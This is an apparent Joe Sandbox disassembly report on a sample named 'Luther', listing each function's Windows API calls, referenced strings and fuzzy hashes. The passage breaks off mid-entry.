Instruction ID: 2fc06874cb339f90c7c84723df49e45a5ad772cfc356a45c3b201917f4c8e4e4
Opcode Fuzzy Hash: 5bc1c7c83dfd0e9c16771ae82d6bd31c34886a196b3d7e498248bf3a9cd01fb8
Instruction Fuzzy Hash: 70C17E7590464AEFDB20CFA8C944BEDBBF1FF08318F14A41AE899B3250D734A951DB60

Function 00E6D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00E6D237
_free.LIBCMT ref: 00E6D2A2
_free.LIBCMT ref: 00E6D2C8
_free.LIBCMT ref: 00E6D2F1
_free.LIBCMT ref: 00E6D329
_free.LIBCMT ref: 00E6D35A
_free.LIBCMT ref: 00E6D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00E6D41C
_free.LIBCMT ref: 00E6D435

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 4e261bc3158297ca73ac43bca503f6ca783fef5125913d40ad75cbb8fd470171
Instruction ID: e452d5360a12341b84f640f1f41f6907d03c3721961f2cae5f620e11f81f9db3
Opcode Fuzzy Hash: 4e261bc3158297ca73ac43bca503f6ca783fef5125913d40ad75cbb8fd470171
Instruction Fuzzy Hash: 70614671F89305AFDB21AF75FC81AAD7BE4FF023A4B84256DE904F7291D63188008791

Function 00EC5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00EC5C24
ShowWindow.USER32(?,00000000), ref: 00EC5C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00EC5C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00EC5C6F

Part of subcall function 00EC79F2: DeleteObject.GDI32(00000000), ref: 00EC7A1E

GetWindowLongW.USER32(?,000000F0), ref: 00EC5CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC5CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EC5CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00EC5D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00EC5D34

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: b20056e894f53da9341cd14ba617d382f4cee74a91d7d9d2f926387edc790f56
Instruction ID: 34eb672863ed21f29f59ce83993d3ab6c37f9432f92e3137433de6baccece6e8
Opcode Fuzzy Hash: b20056e894f53da9341cd14ba617d382f4cee74a91d7d9d2f926387edc790f56
Instruction Fuzzy Hash: 1651AE36640B08BFEF249B14CD49FD97FA1AB04354F14611AB925BA1E0C773B9C2DB41

Function 00E313A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00E728D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00E728EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E728FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00E72912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E72933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E311F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E72942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E7295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E311F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E7296E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 6c15d8295b24bac5f3dcb0c65276fa2073a14b95ec1416cfe5cc8d10f06a1973
Instruction ID: 5bf4a412047b7e25bd8cfdb0cdc4515801d33dbde720896baafcea24200cfe99
Opcode Fuzzy Hash: 6c15d8295b24bac5f3dcb0c65276fa2073a14b95ec1416cfe5cc8d10f06a1973
Instruction Fuzzy Hash: 57515A30600209AFDB24CF25CC49FAA7BB5FF88714F10952DFA56A72A0D771E991EB50

Function 00EACB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EACBC7
GetLastError.KERNEL32 ref: 00EACBDA
SetEvent.KERNEL32(?), ref: 00EACBEE

Part of subcall function 00EACC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EACCB7
Part of subcall function 00EACC98: GetLastError.KERNEL32 ref: 00EACD67
Part of subcall function 00EACC98: SetEvent.KERNEL32(?), ref: 00EACD7B
Part of subcall function 00EACC98: InternetCloseHandle.WININET(00000000), ref: 00EACD86

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: e10c7a517b85a1888144fe1ea4aff90275ab807bb1378da01ee97c524924c7f7
Instruction ID: 4bd22cae70a3e5a366d96966fe28e81515fb43c7a45e19372c87cb126830797f
Opcode Fuzzy Hash: e10c7a517b85a1888144fe1ea4aff90275ab807bb1378da01ee97c524924c7f7
Instruction Fuzzy Hash: E131A171104701AFDB218F75CD44AABBBF8FF49314B20553DF85AAA610CB32E815EB60

Function 00E92EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E94393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E943AD
Part of subcall function 00E94393: GetCurrentThreadId.KERNEL32 ref: 00E943B4
Part of subcall function 00E94393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E92F00), ref: 00E943BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00E92F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E92F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E92F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00E92F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E92F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E92F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00E92F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E92F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E92F74

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 8faa4630f6649e6deb3b2a44778bb125568d30de7cc01d2ba3ddf61f72596c5f
Instruction ID: b2e95944382d086611bd5e42e37f2f9abf5d744c2b6b92470ef6c3edd55ee737
Opcode Fuzzy Hash: 8faa4630f6649e6deb3b2a44778bb125568d30de7cc01d2ba3ddf61f72596c5f
Instruction Fuzzy Hash: 3201D870788214BFFF1067699C8AF593F99DB4DB11F110025F358BE1E0C9E35445CAA9

Function 00E92150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E91D95,?,?,00000000), ref: 00E92159
HeapAlloc.KERNEL32(00000000,?,00E91D95,?,?,00000000), ref: 00E92160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E91D95,?,?,00000000), ref: 00E92175
GetCurrentProcess.KERNEL32(?,00000000,?,00E91D95,?,?,00000000), ref: 00E9217D
DuplicateHandle.KERNEL32(00000000,?,00E91D95,?,?,00000000), ref: 00E92180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E91D95,?,?,00000000), ref: 00E92190
GetCurrentProcess.KERNEL32(00E91D95,00000000,?,00E91D95,?,?,00000000), ref: 00E92198
DuplicateHandle.KERNEL32(00000000,?,00E91D95,?,?,00000000), ref: 00E9219B
CreateThread.KERNEL32(00000000,00000000,00E921C1,00000000,00000000,00000000), ref: 00E921B5

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 57b4b98cd9f11203aceaa45a7ae39ae00c6c579b840a50087c5547dfa0db5bf6
Instruction ID: 3177b8ab5e9b18f8f1f74fe1c990a7d4cede4e9c044daa082de1caa0bac91485
Opcode Fuzzy Hash: 57b4b98cd9f11203aceaa45a7ae39ae00c6c579b840a50087c5547dfa0db5bf6
Instruction Fuzzy Hash: DC01CDB5245344BFEB10AFA6DC4DF6B7BACEB88711F054425FA05EB1A1CA729805CB30

Function 00EBAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00E9DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00E9DDAC
Part of subcall function 00E9DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00E9DDBA
Part of subcall function 00E9DD87: CloseHandle.KERNEL32(00000000), ref: 00E9DE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBABCA
GetLastError.KERNEL32 ref: 00EBABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBAC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 00EBACC5
GetLastError.KERNEL32(00000000), ref: 00EBACD0
CloseHandle.KERNEL32(00000000), ref: 00EBAD21

Strings

SeDebugPrivilege, xrefs: 00EBABEC

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: cd7b5891ec4a885c7e203643cd4356202362a94d2c5291e2d245de68f7da8427
Instruction ID: 441be8a1ed804b89e11bca363c440bc11b0d17bd74a909eacf9d7a70495a7ea3
Opcode Fuzzy Hash: cd7b5891ec4a885c7e203643cd4356202362a94d2c5291e2d245de68f7da8427
Instruction Fuzzy Hash: 9D61C3702086419FDB20DF15C499F66BBE1AF44308F5894ACE4656B7A3C772EC49CB92

Function 00EC4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EC43C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00EC43D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EC43F0
_wcslen.LIBCMT ref: 00EC4435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00EC4462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EC4490

Strings

SysListView32, xrefs: 00EC4393

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 3bc0dcb1aa58f5e17a095eaeb6ec2c29c17d90f8d7fdad5a25cc2382918f7665
Instruction ID: 8413ae3681c101f3724070e6841854296ca5a70bfe463263742073b0c6689035
Opcode Fuzzy Hash: 3bc0dcb1aa58f5e17a095eaeb6ec2c29c17d90f8d7fdad5a25cc2382918f7665
Instruction Fuzzy Hash: 4041DEB1A00308ABDF219F64CD49FEA7BA9FB48354F10112AF954F72D1D7729981DB90

Function 00E9C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E9C6C4
IsMenu.USER32(00000000), ref: 00E9C6E4
CreatePopupMenu.USER32 ref: 00E9C71A
GetMenuItemCount.USER32(01085C68), ref: 00E9C76B
InsertMenuItemW.USER32(01085C68,?,00000001,00000030), ref: 00E9C793

Strings

0, xrefs: 00E9C66F
2, xrefs: 00E9C6FE

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 53c7676d8e9ca8797be29c8ee309ed8b77032378c69523be8acc70f124985178
Instruction ID: 6af3007d7bb774823bbef2e12f2f2710f36aea714f9d967e9a19e091458436fd
Opcode Fuzzy Hash: 53c7676d8e9ca8797be29c8ee309ed8b77032378c69523be8acc70f124985178
Instruction Fuzzy Hash: 30518C70600205ABDF10EFB8D9C4BAEBBF4AF59318F34512AE911B7291D3719945CF61

Function 00E9D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00E9D1BE

Strings

stop, xrefs: 00E9D18F
info, xrefs: 00E9D15F
question, xrefs: 00E9D177
blank, xrefs: 00E9D140
warning, xrefs: 00E9D1A7

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: ac6f83256fd2955ed757d288627515ec5ba946c40e9988a5b0e837699cb4bd0b
Instruction ID: 972f6f91cd0751b49e01e2c8e761a470fd4b41e8aab5023d567b4d2f7b84f7a8
Opcode Fuzzy Hash: ac6f83256fd2955ed757d288627515ec5ba946c40e9988a5b0e837699cb4bd0b
Instruction Fuzzy Hash: 0E11DA7725D32ABEEB055B56DC82DBA77EC9F05769B20202AF900B61C1E7B55A404260

Function 00E9E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00E9E759
gethostname.WSOCK32(?,00000100), ref: 00E9E773
gethostbyname.WSOCK32(?), ref: 00E9E780
inet_ntoa.WSOCK32(?), ref: 00E9E7C2
_strcat.LIBCMT ref: 00E9E7D0
WSACleanup.WSOCK32 ref: 00E9E7F5

Strings

0.0.0.0, xrefs: 00E9E79E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 12b783726205dd86d3a7b80ef83f6cf5eef78894a85cf59c5ccf2943705b33b3
Instruction ID: 13f847486bf875b15831e243a3f4c7e361e745cf3022c6cc9beebac65783b564
Opcode Fuzzy Hash: 12b783726205dd86d3a7b80ef83f6cf5eef78894a85cf59c5ccf2943705b33b3
Instruction Fuzzy Hash: F31124728041147FDF24A7A0DC4AFEAB7ACDF40315F0010BAFA01B2091EE728A868661

Function 00E9F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00E9F641
_wcslen.LIBCMT ref: 00E9F652
_wcslen.LIBCMT ref: 00E9F690
_wcslen.LIBCMT ref: 00E9F6C6
_wcslen.LIBCMT ref: 00E9F6F6
_wcslen.LIBCMT ref: 00E9F706
_wcslen.LIBCMT ref: 00E9F742
_wcslen.LIBCMT ref: 00E9F771

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 9632a1bad9803ac99430e15185bb4590955f72bdec0e277cf10c1597a45fbd34
Instruction ID: 8e4d09f54b781c67560ef23dd1148651d3895856869369b8e3d15e64372eae39
Opcode Fuzzy Hash: 9632a1bad9803ac99430e15185bb4590955f72bdec0e277cf10c1597a45fbd34
Instruction Fuzzy Hash: 64419565C11114B9DB11EBF8CC86ACFB7E8AF05311F50A862F918F3161FA74D259C3A6

Function 00E4FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E739E2,00000004,00000000,00000000), ref: 00E4FC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00E739E2,00000004,00000000,00000000), ref: 00E8FC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E739E2,00000004,00000000,00000000), ref: 00E8FC98

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: eda0811eeb3a66773bdd2ed8cfd9236a054de79c36e188c2026619d3be22eedc
Instruction ID: 55ef05b96a36bdc182748c9cb1200deb5a3fc316036bc6b07b926fbef40b44b5
Opcode Fuzzy Hash: eda0811eeb3a66773bdd2ed8cfd9236a054de79c36e188c2026619d3be22eedc
Instruction Fuzzy Hash: F8414A3060838C9EC7349B39E9CCB69FBD2AB46B15F14743DE94F76A60C632A840D718

Function 00EC379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00EC37B7
GetDC.USER32(00000000), ref: 00EC37BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EC37CA
ReleaseDC.USER32(00000000,00000000), ref: 00EC37D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EC3812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EC3823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EC6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00EC385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EC387D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 2bc76e5e8c16dc4cc01253d032e400616947607c7a43e865dc8732cc9291dc6a
Instruction ID: 1ba9a94d032efeb7687e26b83f60dedba699d2081136a128b4de865142be4c6b
Opcode Fuzzy Hash: 2bc76e5e8c16dc4cc01253d032e400616947607c7a43e865dc8732cc9291dc6a
Instruction Fuzzy Hash: FF3191721052147FEB154F55DC49FEB3BA9EF49715F044069FE08AA191C6B69C42C7A0

Function 00EB5A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00EB5A64
NULL Pointer assignment, xrefs: 00EB5A8B, 00EB5DE0

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 5ae1d0667846513943e6b2e5673b6efc2e48f34edad170762c3cfa2f344c4506
Instruction ID: 650f7de2038ee8f387f4d48260bb1bdf4844e327c95f39716df0f668135df49a
Opcode Fuzzy Hash: 5ae1d0667846513943e6b2e5673b6efc2e48f34edad170762c3cfa2f344c4506
Instruction Fuzzy Hash: 4BD18B72A0060A9FDF10CFA8C885BEEB7B5BF48308F149569E915BB290E771ED45CB50

Function 00E718A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

